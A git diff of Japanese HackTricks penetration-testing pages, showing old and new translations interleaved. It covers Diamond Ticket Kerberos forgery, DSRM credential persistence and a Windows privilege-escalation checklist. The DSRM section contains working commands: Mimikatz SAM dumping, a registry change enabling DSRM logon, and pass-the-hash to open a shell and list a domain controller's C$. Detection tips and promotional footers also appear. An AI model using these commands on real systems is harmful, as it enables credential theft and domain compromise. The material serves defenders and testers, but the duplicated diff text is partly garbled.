* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
## ダイヤモンドチケット
**金のチケット**のように、ダイヤモンドチケットは**任意のユーザーとして任意のサービスにアクセスするためのTGT**です。金のチケットは完全にオフラインで作成され、そのドメインのkrbtgtハッシュで暗号化され、ログオンセッションに渡されて使用されます。ドメインコントローラは、正当に発行されたTGTを追跡しないため、自身のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。
**ゴールデンチケットと同様に**、ダイヤモンドチケットは**任意のサービスに任意のユーザーとしてアクセスするために使用できる**TGTです。ゴールデンチケットは完全にオフラインで偽造され、そのドメインのkrbtgtハッシュで暗号化され、その後ログオンセッションに渡されて使用されます。ドメインコントローラーは正当に発行したTGTを追跡しないため、自身のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。
金のチケットの使用を検出するための2つの一般的な技術があります
ゴールデンチケットの使用を検出する一般的な手法は2つあります:
* 対応するAS-REQがないTGS-REQを探す。
* Mimikatzのデフォルトの10年間の有効期限など、ばかげた値を持つTGTを探す。
* Mimikatzのデフォルトの10年の有効期間など、不自然な値を持つTGTを探す。
**ダイヤモンドチケット**は、**DCによって発行された正規のTGTのフィールドを変更することで作成**されます。これは、TGTを要求し、ドメインのkrbtgtハッシュで復号化し、チケットの必要なフィールドを変更し、それを再度暗号化することで実現されます。これにより、ダイヤモンドチケットは以下の金のチケットの欠点を克服します
**ダイヤモンドチケット**は、**DCによって発行された正当なTGTのフィールドを変更することで作成されます**。これは、**TGTを要求**し、ドメインのkrbtgtハッシュで**復号化**し、チケットの望ましいフィールドを**変更**してから、再び**暗号化する**ことで達成されます。これにより、ゴールデンチケットの先述の2つの短所を**克服します**:
* TGS-REQには前のAS-REQが存在します。
* TGTはDCによって発行されたものであり、ドメインのKerberosポリシーのすべての正しい詳細を持っています。金のチケットではこれらを正確に偽造することができますが、より複雑でミスの余地があります。
* TGS-REQは先行するAS-REQを持ちます。
* TGTはDCによって発行されたものであり、ドメインのKerberosポリシーからすべての正しい詳細を持っています。これらはゴールデンチケットで正確に偽造することができますが、より複雑で間違いが生じやすいです。
```bash
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid
@ -41,25 +39,18 @@ powershell Get-DomainUser -Identity <username> -Properties objectsid
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
```
\
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェックしてください!</strong></summary>
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**。
</details>
```

View file

@ -1,58 +1,54 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
</details>
# DSRMの資格情報
# DSRMクレデンシャル
各**DC**には**ローカル管理者**アカウントがあります。このマシンで管理者権限を持っている場合、mimikatzを使用して**ローカル管理者のハッシュをダンプ**することができます。その後、レジストリを変更してこのパスワードを**アクティベート**し、このローカル管理者ユーザーにリモートアクセスできるようにします。\
各**DC**内には**ローカル管理者**アカウントが存在します。このマシンで管理者権限を持っている場合、mimikatzを使用して**ローカル管理者のハッシュをダンプ**することができます。次に、レジストリを変更してこのパスワードを**アクティブにし**、このローカル管理者ユーザーにリモートアクセスできるようにします。\
まず、DC内の**ローカル管理者**ユーザーの**ハッシュ**を**ダンプ**する必要があります:
```bash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
```
次に、そのアカウントが機能するかどうかを確認し、レジストリキーの値が「0」であるか存在しない場合は、「2」に**設定する必要があります**
そのアカウントが機能するかどうかを確認する必要があります。レジストリキーに値「0」があるか、存在しない場合は、**「2」に設定する必要があります**
```bash
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
```
次に、PTHを使用してC$の内容をリストしたり、シェルを取得したりすることができます。注意点として、PTHでそのハッシュをメモリ内に持つ新しいPowerShellセッションを作成する場合、「ドメイン」にはDCマシンの名前だけが使用されることに注意してください。
その後、PTHを使用して**C$の内容をリストしたり、シェルを取得することができます**。新しいpowershellセッションをそのハッシュをメモリ内で使用して作成する場合PTHのために、**使用される"ドメイン"はDCマシンの名前だけです**
```bash
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
```
詳細については、[https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714)と[https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)を参照してください。
以下の情報については、こちらを参照してください: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) と [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
## 緩和
## 軽減
* イベントID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`の作成/変更の監査
* イベント ID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior` の作成/変更を監査する
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricks をサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
* **HackTricks にあなたの会社を広告したい**、または **HackTricks を PDF でダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com) を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見する、私たちの独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクション
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に**参加する**か、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して、あなたのハッキングのコツを**共有する**。
</details>

View file

@ -2,135 +2,136 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
</details>
### **Windowsローカル特権昇格のための最適なツール:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### **Windowsローカル特権昇格ベクトルを探すための最良のツール:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### [システム情報](windows-local-privilege-escalation/#system-info)
* [ ] [**システム情報**](windows-local-privilege-escalation/#system-info)を取得する
* [ ] スクリプトを使用して**カーネル**の[**脆弱性を検索**](windows-local-privilege-escalation/#version-exploits)する
* [ ] グーグルを使用してカーネルの**脆弱性を検索**する
* [ ] searchsploitを使用してカーネルの**脆弱性を検索**する
* [ ] スクリプトを使用して**カーネル** [**エクスプロイトを探す**](windows-local-privilege-escalation/#version-exploits)
* [ ] **Googleを使用して**カーネル**エクスプロイトを探す**
* [ ] **searchsploitを使用して**カーネル**エクスプロイトを探す**
* [ ] [**環境変数**](windows-local-privilege-escalation/#environment)に興味深い情報はありますか?
* [ ] [**PowerShell履歴**](windows-local-privilege-escalation/#powershell-history)にパスワードはありますか?
* [ ] [**PowerShell履歴**](windows-local-privilege-escalation/#powershell-history)にパスワードはありますか?
* [ ] [**インターネット設定**](windows-local-privilege-escalation/#internet-settings)に興味深い情報はありますか?
* [ ] [**ドライブ**](windows-local-privilege-escalation/#drives)をチェックする
* [ ] [**WSUSの脆弱性**](windows-local-privilege-escalation/#wsus)をチェックする
* [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)をチェックする
* [ ] [**ドライブ**](windows-local-privilege-escalation/#drives)
* [ ] [**WSUSエクスプロイト**](windows-local-privilege-escalation/#wsus)
* [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)
### [ログ/AV列挙](windows-local-privilege-escalation/#enumeration)
* [ ] [**監査**](windows-local-privilege-escalation/#audit-settings)と[**WEF**](windows-local-privilege-escalation/#wef)設定をチェックする
* [ ] [**監査**](windows-local-privilege-escalation/#audit-settings)と[**WEF**](windows-local-privilege-escalation/#wef)設定をチェックする
* [ ] [**LAPS**](windows-local-privilege-escalation/#laps)をチェックする
* [ ] [**WDigest**](windows-local-privilege-escalation/#wdigest)が有効かどうかをチェックする
* [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)をチェックする
* [ ] [**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)をチェックする
* [ ] [**キャッシュされた資格情報**](windows-local-privilege-escalation/#cached-credentials)をチェックする
* [ ] いずれかの[**AV**](windows-av-bypass)があるかどうかをチェックする
* [ ] [**AppLockerポリシー**](authentication-credentials-uac-and-efs#applocker-policy)をチェックする
* [ ] [**UAC**](authentication-credentials-uac-and-efs/uac-user-account-control)をチェックする
* [ ] [**ユーザー権**](windows-local-privilege-escalation/#users-and-groups)をチェックする
* [ ] [**現在の**ユーザー**権**](windows-local-privilege-escalation/#users-and-groups)をチェックする
* [ ] 特権のあるグループのメンバーですか?[**特権のあるグループ**](windows-local-privilege-escalation/#privileged-groups)のメンバーですか?
* [ ] これらのトークンのいずれかが有効になっているかどうかをチェックする**SeImpersonatePrivilege、SeAssignPrimaryPrivilege、SeTcbPrivilege、SeBackupPrivilege、SeRestorePrivilege、SeCreateTokenPrivilege、SeLoadDriverPrivilege、SeTakeOwnershipPrivilege、SeDebugPrivilege** ?
* [ ] [**ユーザーセッション**](windows-local-privilege-escalation/#logged-users-sessions)をチェックする
* [ ] [**ユーザーホームフォルダ**](windows-local-privilege-escalation/#home-folders)をチェックする(アクセス可能か
* [ ] [**WDigest**](windows-local-privilege-escalation/#wdigest)がアクティブかどうかをチェックする
* [ ] [**LSA保護**](windows-local-privilege-escalation/#lsa-protection)
* [ ] [**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**キャッシュされた資格情報**](windows-local-privilege-escalation/#cached-credentials)
* [ ] 任意の[**AV**](windows-av-bypass)があるかチェックする
* [ ] [**AppLockerポリシー**](authentication-credentials-uac-and-efs#applocker-policy)
* [ ] [**UAC**](authentication-credentials-uac-and-efs/uac-user-account-control)
* [ ] [**ユーザー**](windows-local-privilege-escalation/#users-and-groups)
* [ ] [**現在の**ユーザー**権**](windows-local-privilege-escalation/#users-and-groups)をチェックする
* [ ] [**特権グループのメンバー**](windows-local-privilege-escalation/#privileged-groups)ですか?
* [ ] [これらのトークンが有効になっているかどうかをチェックする](windows-local-privilege-escalation/#token-manipulation)**SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege**
* [ ] [**ユーザーセッション**](windows-local-privilege-escalation/#logged-users-sessions)
* [ ] [**ユーザーホーム**](windows-local-privilege-escalation/#home-folders)をチェックする(アクセス?)
* [ ] [**パスワードポリシー**](windows-local-privilege-escalation/#password-policy)をチェックする
* [ ] [**クリップボードの内容**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)は何ですか?
* [ ] [**クリップボードの中身**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)は何ですか?
### [ネットワーク](windows-local-privilege-escalation/#network)
* [ ] **現在の**[**ネットワーク情報**](windows-local-privilege-escalation/#network)をチェックする
* [ ] 外部に制限された**非表示のローカルサービス**をチェックする
* [ ] [**現在の**ネットワーク**情報**](windows-local-privilege-escalation/#network)をチェックする
* [ ] 外部に制限された**隠されたローカルサービス**をチェックする
### [実行中のプロセス](windows-local-privilege-escalation/#running-processes)
* [ ] プロセスのバイナリの[**ファイルとフォルダのアクセス権**](windows-local-privilege-escalation/#file-and-folder-permissions)をチェックする
* [ ] [**メモリパスワードの収集**](windows-local-privilege-escalation/#memory-password-mining)を行う
* [ ] [**安全でないGUIアプリ**](windows-local-privilege-escalation/#insecure-gui-apps)をチェックする
* [ ] プロセスバイナリの[**ファイルとフォルダの権限**](windows-local-privilege-escalation/#file-and-folder-permissions)
* [ ] [**メモリパスワードマイニング**](windows-local-privilege-escalation/#memory-password-mining)
* [ ] [**安全でないGUIアプリ**](windows-local-privilege-escalation/#insecure-gui-apps)
### [サービス](windows-local-privilege-escalation/#services)
* [ ] どのサービスでも**変更**できますか?(windows-local-privilege-escalation#permissions)
* [ ] どのサービスでも**実行される**バイナリを**変更**できますか?(windows-local-privilege-escalation/#modify-service-binary-path)
* [ ] どのサービスでも**レジストリ**を**変更**できますか?(windows-local-privilege-escalation/#services-registry-modify-permissions)
* [ ] **クォートされていないサービス**のバイナリ**パス**を利用できますか?(windows-local-privilege-escalation/#unquoted-service-paths)
* [ ] [**任意のサービスを変更できますか**](windows-local-privilege-escalation#permissions)
* [ ] [**任意のサービスによって実行されるバイナリを変更できますか**](windows-local-privilege-escalation/#modify-service-binary-path)
* [ ] [**任意のサービスのレジストリを変更できますか**](windows-local-privilege-escalation/#services-registry-modify-permissions)
* [ ] [**引用符なしのサービスバイナリパス**](windows-local-privilege-escalation/#unquoted-service-paths)を利用できますか?
### [**アプリケーション**](windows-local-privilege-escalation/#applications)
* [ ] インストールされたアプリケーションの**書き込み**[**権限**](windows-local-privilege-escalation/#write-permissions)
* [ ] [**起動時のアプリケーション**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **脆弱な**[**ドライバ**](windows-local-privilege-escalation/#drivers)
* [ ] インストールされたアプリケーションの[**書き込み権限**](windows-local-privilege-escalation/#write-permissions)
* [ ] [**スタートアップアプリケーション**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **脆弱な** [**ドライバ**](windows-local-privilege-escalation/#drivers)
### [DLLハイジャッキング](windows-local-privilege-escalation/#path-dll-hijacking)
### [DLLハイジャッ](windows-local-privilege-escalation/#path-dll-hijacking)
* [ ] **PATH内の任意のフォルダに書き込む**ことができますか
* [ ] **存在しないDLL**を読み込もうとする既知のサービスバイナリはありますか?
* [ ] **バイナリフォルダ**に**書き込む**ことができますか?
* [ ] PATH内の任意のフォルダに**書き込みができますか**
* [ ] 存在しないDLLをロードしようとする既知のサービスバイナリはありますか?
* [ ] 任意の**バイナリフォルダ**に**書き込み**ができますか?
### [ネットワーク](windows-local-privilege-escalation/#network)
* [ ] ネットワークを列挙します(共有、インターフェース、ルート、隣接者、...)
* [ ] ローカルホスト(127.0.0.1)でリッスンしているネットワークサービスに特別な注意を払います
* [ ] ネットワークを列挙する(共有、インターフェース、ルート、隣接、...
* [ ] localhost (127.0.0.1)でリスニングしているネットワークサービスに特に注意する
### [Windows資格情報](windows-local-privilege-escalation/#windows-credentials)
### [Windows資格情報](windows-local-privilege-escalation/#windows-credentials)
* [ ] [**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)資格情報
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault)の利用可能な資格情報はありますか?
* [ ] 興味深い[**DPAPI資格情報**](windows-local-privilege-escalation/#dpapi)はありますか
* [ ] 保存された[**Wifiネットワークのパスワード**](windows-local-privilege-escalation/#wifi)はありますか
* [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials)資格情報
* [ ] 使用できる[**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault)資格情報はありますか?
* [ ] 興味深い[**DPAPI資格情報**](windows-local-privilege-escalation/#dpapi)
* [ ] 保存された[**Wifiネットワーク**](windows-local-privilege-escalation/#wifi)のパスワード
* [ ] [**保存されたRDP接続**](windows-local-privilege-escalation/#saved-rdp-connections)に興味深い情報はありますか?
* [ ] 最近実行されたコマンドの中にパスワードはありますか?(windows-local-privilege-escalation/#recently-run-commands)
* [ ] [**リモートデスクトップ資格情報マネージャー**](windows-local-privilege-escalation/#remote-desktop-credential-manager)のパスワードはありますか
* [ ] [**AppCmd.exe**が存在しますか](windows-local-privilege-escalation/#appcmd-exe)?資格情報はありますか
* [ ] [**最近実行されたコマンド**](windows-local-privilege-escalation/#recently-run-commands)にパスワードはありますか?
* [ ] [**リモートデスクトップ資格情報マネージャー**](windows-local-privilege-escalation/#remote-desktop-credential-manager)のパスワード?
* [ ] [**AppCmd.exe**](windows-local-privilege-escalation/#appcmd-exe)が存在しますか?資格情報?
* [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)DLLサイドローディング
### [ファイルとレジストリ(資格情報)](windows-local-privilege-escalation/#files-and-registry-credentials)
### [ファイルとレジストリ(資格情報)](windows-local-privilege-escalation/#files-and-registry-credentials)
* [ ] **Putty:** [**資格情報**](windows-local-privilege-escalation/#putty-creds) **および** [**SSHホストキー**](windows-local-privilege-escalation/#putty-ssh-host-keys)
* [ ] レジストリに[**SSHキー**](windows-local-privilege-escalation/#ssh-keys-in-registry)はありますか
* [ ] [**未承認ファイル**](windows-local-privilege-escalation/#unattended-files)のパスワードはありますか?
* [ ] いずれかの[**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups)バックアップはありますか
* [ ] [**クラウド資格情報**](windows-local-privilege-escalation/#cloud-credentials)はありますか
* [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml)ファイルはありますか
* [ ] [**キャッシュされたGPPパスワード**](windows-local-privilege-escalation/#cached-gpp-pasword)はありますか
* [ ] [**IIS Web構成ファイル**](windows-local-privilege-escalation/#iis-web-config)のパスワードはありますか?
* [ ] [**Webログ**](windows-local-privilege-escalation/#logs)に興味深い情報はありますか?
* [ ] ユーザーに[**資格情報を求**](windows-local-privilege-escalation/#ask-for-credentials)ますか?
* [ ] [**ゴミ箱内の興味深いファイル**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)はありますか?
* [ ] 他の[**資格情報を含むレジストリ**](windows-local-privilege-escalation/#inside-the-registry)はありますか
* [ ] [**ブラウザデータ**](windows-local-privilege-escalation/#browsers-history)(dbs、履歴、ブックマークなど)の中に興味深い情報はありますか
* [ ] **Putty:** [**資格情報**](windows-local-privilege-escalation/#putty-creds) **** [**SSHホストキー**](windows-local-privilege-escalation/#putty-ssh-host-keys)
* [ ] [**レジストリ内のSSHキー**](windows-local-privilege-escalation/#ssh-keys-in-registry)
* [ ] [**自動実行ファイル**](windows-local-privilege-escalation/#unattended-files)にパスワードはありますか?
* [ ] 任意の[**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups)バックアップ?
* [ ] [**クラウド資格情報**](windows-local-privilege-escalation/#cloud-credentials)
* [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml)ファイル?
* [ ] [**キャッシュされたGPPパスワード**](windows-local-privilege-escalation/#cached-gpp-pasword)
* [ ] [**IIS Web設定ファイル**](windows-local-privilege-escalation/#iis-web-config)にパスワードはありますか?
* [ ] [**ウェブログ**](windows-local-privilege-escalation/#logs)に興味深い情報はありますか?
* [ ] ユーザーに[**資格情報を求める**](windows-local-privilege-escalation/#ask-for-credentials)ことを望みますか?
* [ ] [**ごみ箱内のファイル**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)に興味深いものはありますか?
* [ ] 他の[**資格情報を含むレジストリ**](windows-local-privilege-escalation/#inside-the-registry)
* [ ] [**ブラウザデータ**](windows-local-privilege-escalation/#browsers-history)dbs、履歴、ブックマーク、...
* [ ] ファイルとレジストリでの[**一般的なパスワード検索**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry)
* [ ] パスワードを自動的に検索する[**ツール**](windows-local-privilege-escalation/#tools-that-search-for-passwords)はありますか?
* [ ] パスワードを自動的に検索する[**ツール**](windows-local-privilege-escalation/#tools-that-search-for-passwords)
### [漏洩したハンドラ](windows-local-privilege-escalation/#leaked-handlers)
### [リークされたハンドラ](windows-local-privilege-escalation/#leaked-handlers)
* [ ] 管理者が実行したプロセスのハンドラにアクセスできますか?
* [ ] 管理者によって実行されるプロセスのハンドラにアクセスできますか?
### [パイプクライアントの擬似化](windows-local-privilege-escalation/#named-pipe-client-impersonation)
### [パイプクライアントのなりすまし](windows-local-privilege-escalation/#named-pipe-client-impersonation)
* [ ] 乱用できるかどうかを確認します
* [ ] それを悪用できるかどうかをチェックする
<details>
